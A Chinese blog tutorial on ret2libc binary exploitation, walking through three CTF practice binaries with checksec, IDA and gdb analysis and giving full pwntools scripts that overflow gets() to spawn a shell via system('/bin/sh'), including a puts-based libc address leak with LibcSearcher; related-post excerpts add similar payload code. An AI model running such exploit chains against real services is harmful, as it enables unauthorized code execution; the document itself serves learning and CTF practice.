pwn基本ROP——ret2libc

最新推荐文章于 2024-12-08 21:16:44 发布
原创 最新推荐文章于 2024-12-08 21:16:44 发布 · 3.3k 阅读 · 77 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #系统安全

本文深入探讨了Ret2libc攻击原理,包括PLT和GOT表的作用,以及如何利用checksec和IDA进行漏洞分析。通过三个ret2libc实例,详细解释了如何构造payload以执行system(/bin/sh),包括寻找函数地址、计算返回偏移量和处理无系统函数地址的情况。同时介绍了libcsearcher工具用于查找动态库函数偏移量。

ret2libc

环境

retlibc1

ret2libc2

ret2libc3

PLT表和GOT表

在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。

Globle offset table(GOT)全局偏移量表,位于数据段,是一个每个条目是8字节地址的数组,用来存储外部函数在内存的确切地址

Procedure linkage table(PLT)过程连接表,位于代码段,是一个每个条目是16字节内容的数组,使得代码能够方便的访问共享的函数或者变量

关于GOT与PLT的详细内容可以看这个视频学习,这里只进行简要介绍

简单来说,当程序第一次执行函数A时,流程如下:
请添加图片描述
在汇编程序调用函数A时,会先找到函数A对应的PLT表,PLT表中第一行指令则是找到函数A对应的GOT表。此时由于是程序第一次调用A,GOT表还未更新,会先去公共PLT进行一番操作查找函数A的位置,找到A的位置后再更新A的GOT表,并调用函数A。

当程序第二次执行函数A时,流程如下请添加图片描述
可以看到此时A的GOT表已经更新,可以直接在GOT表中找到其在内存中的位置并直接调用。

ret2libc1

原理

利用程序自带的system函数和/bin/sh字符串构造system("/bin/sh")函数,通过主函数gets函数溢出覆盖返回值来返回到system函数地址,从而执行上述函数获得最高权限。

漏洞分析

使用checksec查看保护措施

checksec ret2libc1

在这里插入图片描述
可以看到是32位程序,且仅开启了堆栈不可执行

使用IDA32位进行调试

主函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets(s);
  return 0;
}

在这里我们发现了gets危险函数,gets不对输入数据的边界作限制,故可利用这个函数造成溢出覆盖返回值来执行我们想要执行的函数

观测左边函数一栏,我们可以发现存在_system函数,其plt地址为0x08048460
在这里插入图片描述

再利用Shift + F12组合键查看字符串,我们可以看到/bin/sh字符串,其地址为0x08048720
在这里插入图片描述
我们就可以利用上述两个信息来构造一套组合拳,通过main函数的return返回到system函数的plt地址来执行该函数,并传入/bin/sh字符串的地址,具体可见payload

获取偏移量

利用gdb进行随机字符填充,覆盖返回值,然后根据返回值的覆盖情况来获取return偏移量。

gdb ret2libc1
cyclic 200
r

在这里插入图片描述
可以看到Invalid address 0x62616164,我们再利用cyclic查看一下这四个字符在随机字符中的位置
在这里插入图片描述
可以看到是在112位,所以return偏移量为112

payload

from pwn import *
 
io = process('./ret2libc1')

sys_plt = p32(0x08048460)
bin_sh = p32(0x08048720)

payload = bytes('a' * 112,'utf-8') + sys_plt + bytes('bbbb','utf-8') + bin_sh

io.sendline(payload)

io.interactive()
地址栈中数据
ebp ~ ebp - 0x64a
main函数returnsys_plt
system函数returnbbbb
system函数参数“/bin/sh”

ret2libc2

原理

这个版本与上个版本的区别就是/bin/sh字段不再出现在程序中,我们只能自行构造/bin/sh
这里可以通过gets函数将/bin/sh输入到.bss段,然后再像ret2libc1一样的操作执行system函数

漏洞分析

checksec

在这里插入图片描述
可以看到是32位程序,仅开启了NX堆栈不可执行

使用IDA进行调试

主函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("Something surprise here, but I don't think it will work.");
  printf("What do you think ?");
  gets(v4);
  return 0;
}

可以看到这里存在与ret2libc1一样的漏洞,可以利用gets来覆盖返回值

我们依旧可以在左边的函数栏找到_system,找到system的plt地址为08048490

再次利用shift + F12查找字符串,并没有发现/bin/sh

但我们发现左边plt段有_gets,所以可以利用gets函数,将全局变量的某个数组作为gets函数的参数,从而输入/bin/sh来自造该字符串

进入.bss段,发现了buf2数组
在这里插入图片描述
利用gdb调试看看这里该地址可以写入
在这里插入图片描述
可以看到,buf2数组在0x804a000~0x804b000段,该段有写入权限

所以我们可以将buf2作为gets函数的参数传入,读入/bin/sh来自造数据,从而执行system函数

payload

from pwn import *
 
io = process('./ret2libc2')

gets_plt = p32(0x08048460)
sys_plt = p32(0x08048490)
buf2_addr = p32(0x0804A080)

payload = bytes('a' * 112,'utf-8') + gets_plt + sys_plt + buf2_addr + buf2_addr

io.sendline(payload)
io.sendline('/bin/sh')

io.interactive()
地址栈中数据
ebp~ebp-0x64a
main函数returngets_plt
gets函数returnsys_plt
gets函数参数&&system函数returnbuf2_addr
system函数参数buf2_addr

ret2libc3

原理

在这道题中,system函数的plt地址也没了,我们必须将system函数和/bin/sh都构造出来才可以获取最高权限。

在程序每次运行时libc函数库的位置都不一样,但libc中的函数的相对位置是不会改变的,所以我们只需要找到一个函数的地址,再找到我们想要的函数的偏移量,就可以找到我们想要执行的函数的地址

但这里的偏移量该怎么查找呢?
这里我们要用到一个工具:libcsearcher
该工具用法如下

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")

漏洞分析

checksec

在这里插入图片描述
可以看到该程序是32位的,且仅开启了NX堆栈不可执行

使用IDA调试

main函数反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets(s);
  return 0;
}

我们依旧可以通过gets函数来修改返回地址,执行想要执行的函数,具体见payload

payload

from pwn import *
from LibcSearcher import *
 
io = process('./ret2libc3')
elf = ELF('./ret2libc3')

puts_plt = p32(elf.plt['puts'])
puts_got = p32(elf.got['puts'])
start_addr = p32(elf.symbols['_start'])
payload = bytes('a' * 112,'utf-8') + puts_plt + start_addr + puts_got
io.sendlineafter("Can you find it !?",payload)
puts_addr = u32(io.recv(4))
print('aa')

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
sys_addr = libcbase + libc.dump("system")
bin_sh_addr = libcbase + libc.dump("str_bin_sh")
payload2 = bytes('a' * 112,'utf-8') + p32(sys_addr) + bytes('b' * 4,'utf-8') + p32(bin_sh_addr)

io.sendlineafter("Can you find it !?",payload2)

io.interactive()

关于ELF的教学可以在这里进行学习

payload1:

地址栈中数据
ebp ~ ebp-0x64a
main函数returnputs_plt
puts函数returnstart_addr
puts函数参数puts_got

这样构造即可输出puts_got,且puts函数返回到_start,即整个程序开始的地方,程序重新运行,我们可以再次输入数据来执行想要的命令,如下

payload2:

地址栈中数据
ebp~ebp-0x64a
main函数returnsys_addr
system函数returnbbbb
system函数参数/bin/sh

这里我们利用puts函数的地址找到了libc的位置,利用puts函数的地址和libc中的puts函数的偏移量找到libc的基址,从而以这个基址加上libcsystem/bin/sh的偏移量找到这两个函数(字符串)的地址,再通过gets函数修改返回值来执行system函数获取权限

pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8803
概述: 前文介绍了ROP基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
CTF(Pwn) Rop + ret2libc 题型 常规解法思路 (初级)
半岛铁盒的博客
03-22 1344
引子 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。 之所以称之为 ROP,是因为核心在于利用了指令
CTF-PWN-栈溢出-初级ROP-【ret2libc
llovewuzhengzi的博客
01-02 1748
当发生信号处理时,会调用func对于的函数。此时注意nptr是输入的内容的起始地址,而&savedregs顾名思义并查看IDA就知道其是栈上保存着rbp的位置,v7是输入的长度,此时存在溢出,当memcpy后可能使得复制的值到到返回地址。ret2libc即控制程序去执行libc库中的函数,通常是返回至某个函数的 plt 处或者某个函数的具体位置 (即某个函数对应的 got 表项的内容)1.dlopen将指定的动态库以特定的方式装载到当前进程实体,并返回一个可操作的句柄,用以后续获取函数地址等操作;
ropret2libc
温和的跳跃
02-04 475
发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个 我回顾一下ret2libc (本身就不熟悉 : ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库 里面包含很多函数,当程序运行到需要链接的地方就会加载进来。 为什么要使用这种办法呢,当程序开启DEP(data execute preve..
PWN——ret2libc
Pr0b1em的博客
12-08 524
ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system(“/bin/sh”),故而此时我们需要知道 system 函数的地址。
ret2libc
huzai9527的博客
02-03 637
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
Ret2libc
钞sir的博客
01-26 9524
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5884
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
pwn学习-ret2libc1
Sa1nZen的博客
06-02 454
pwn学习-ret2libc1
pwn学习-ret2libc2
Sa1nZen的博客
06-16 345
pwn学习-ret2libc2
PWN篇:ret2libc
weixin_44644249的博客
01-28 586
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
Ret2libc 1
weixin_44864859的博客
05-19 819
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
pwn学习——ret2libc2
MrTreebook的博客
11-28 1329
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
pwn ret2libc
清霂的博客
02-04 637
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libc。 libc.so是一个函数库(类似于C语言#include<iostream>的iostrea
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
PWN —— ret2libc2
qq_41696518的博客
07-03 379
ret2libc2
ROPret2libc
酉酉的博客
06-03 1883
ROPret2libc 修改返回地址,让其指向内存中已有的某个函数 当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数,如system() payload结构 通过溢出覆盖返回地址(相当于call system) padding + system address 调用system时的返回地址,可...
pwn ret1libc
最新发布
03-02
### 关于 pwnret2libc 技术的实现方法 #### 概述 ret2libc 是一种利用栈溢出漏洞的技术,通过覆盖返回地址来执行 libc 库中的函数。这种方式不需要注入额外的 shellcode,而是重定向程序流到已有库函数,从而绕过一些安全机制。 #### 原理说明 当发生缓冲区溢出时,攻击者可以控制 EIP 寄存器指向任意位置。如果能够计算出标准 C 函数如 `system()` 的确切内存地址,则可以通过设置参数并调用该函数达到特定目的[^1]。 #### 实现步骤详解 为了成功实施 ret2libc 攻击,通常需要满足以下几个条件: - **获取目标机器上 libc 版本及其加载基址** 这一点非常重要因为不同版本之间函数偏移量会有所差异。对于远程服务器来说这一步可能会变得复杂,但在本地测试环境中相对容易完成[^2]。 - **找到合适的 gadget 链接点** Gadget 是一小段可重复使用的汇编代码片段,它们存在于二进制文件内部并且以 `ret` 结束。理想情况下应该寻找那些可以直接跳转至所需功能入口处的 gadgets 或者构建一系列连续操作最终导向 system() 调用链路[^3]。 - **构造 payload 数据包** Payload 构建是整个过程中最核心的部分之一。它由多个部分组成:首先是填充物用来触发溢出;其次是精心挑选的目标地址(通常是 system@plt 或其他有用函数);最后是要传递给所选函数的实际参数列表,比如 "/bin/sh" 字符串的位置等信息。 ```python from struct import pack # Example of constructing a simple ROP chain for educational purposes only. offset = b"A"*76 # Offset to reach the saved return address on stack system_addr = pack("<I", 0xb7ecffb0) # Address of 'system' function from known libc version exit_addr = pack("<I", 0xb7ecfa80) # Address of 'exit' function, used as next instruction after calling system() sh_str_addr = pack("<I", 0xbffffc9a) # Memory location containing string '/bin/sh' payload = offset + system_addr + exit_addr + sh_str_addr ``` 上述 Python 代码展示了如何创建一个简单的 ROP (Return-Oriented Programming) 链条用于教学演示用途。实际应用中还需要考虑更多因素,例如 ASLR 地址空间布局随机化防护措施的影响等问题。 #### 安全建议与预防措施 现代操作系统已经引入了许多缓解此类攻击的安全特性,例如 DEP 和 ASLR 。因此,在真实世界里单纯依靠传统意义上的 ret2libc 已经难以奏效。不过了解这项技术仍然是非常有价值的,有助于加深对计算机体系结构的理解,并为更高级别的逆向工程打下坚实基础。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值